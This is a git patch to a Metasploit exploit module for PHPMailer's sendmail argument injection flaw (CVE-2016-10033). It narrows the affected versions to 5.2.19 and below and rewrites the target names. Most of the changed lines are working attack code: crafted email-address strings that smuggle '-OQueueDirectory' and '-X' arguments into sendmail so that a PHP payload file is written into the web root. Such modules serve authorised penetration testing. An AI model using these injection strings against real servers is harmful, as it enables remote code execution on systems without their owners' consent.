From cd90fd3b1cd430628265db0b1a899e13cae05554 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Fri, 30 Dec 2016 15:31:15 -0500
Subject: [PATCH] Fix PHPMailer targets since 5.2.20 is not affected

---
 .../exploits/multi/http/phpmailer_arg_injection.rb | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/http/phpmailer_arg_injection.rb b/modules/exploits/multi/http/phpmailer_arg_injection.rb
index 71ecc020e4..c46581147d 100644
--- a/modules/exploits/multi/http/phpmailer_arg_injection.rb
+++ b/modules/exploits/multi/http/phpmailer_arg_injection.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'PHPMailer Sendmail Argument Injection',
       'Description'    => %q{
-        PHPMailer versions up to and including 5.2.20 are affected by a
+        PHPMailer versions up to and including 5.2.19 are affected by a
         vulnerability which can be leveraged by an attacker to write a file with
         partially controlled contents to an arbitrary location through injection
         of arguments that are passed to the sendmail binary. This module
@@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     => [
         ['CVE', '2016-10033'],
+        ['CVE', '2016-10045'],
+        ['EDB', '40968'],
         ['EDB', '40969'],
         ['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
         ['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
@@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Payload'        => {'DisableNops' => true},
       'Targets'        => [
-        ['PHPMailer <=5.2.18', {}],
-        ['PHPMailer 5.2.20', {}]
+        ['PHPMailer <5.2.18', {}],
+        ['PHPMailer 5.2.18 - 5.2.19', {}]
       ],
       'DefaultTarget'  => 0
     ))
@@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_file_name = "#{rand_text_alphanumeric(8)}.php"
     payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
 
-    if target.name == 'PHPMailer <=5.2.18'
+    if target.name == 'PHPMailer <5.2.18'
       email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
-    elsif target.name == 'PHPMailer 5.2.20'
-      email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
+    elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
+      email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
     else
       fail_with(Failure::NoTarget, 'The specified version is not supported')
     end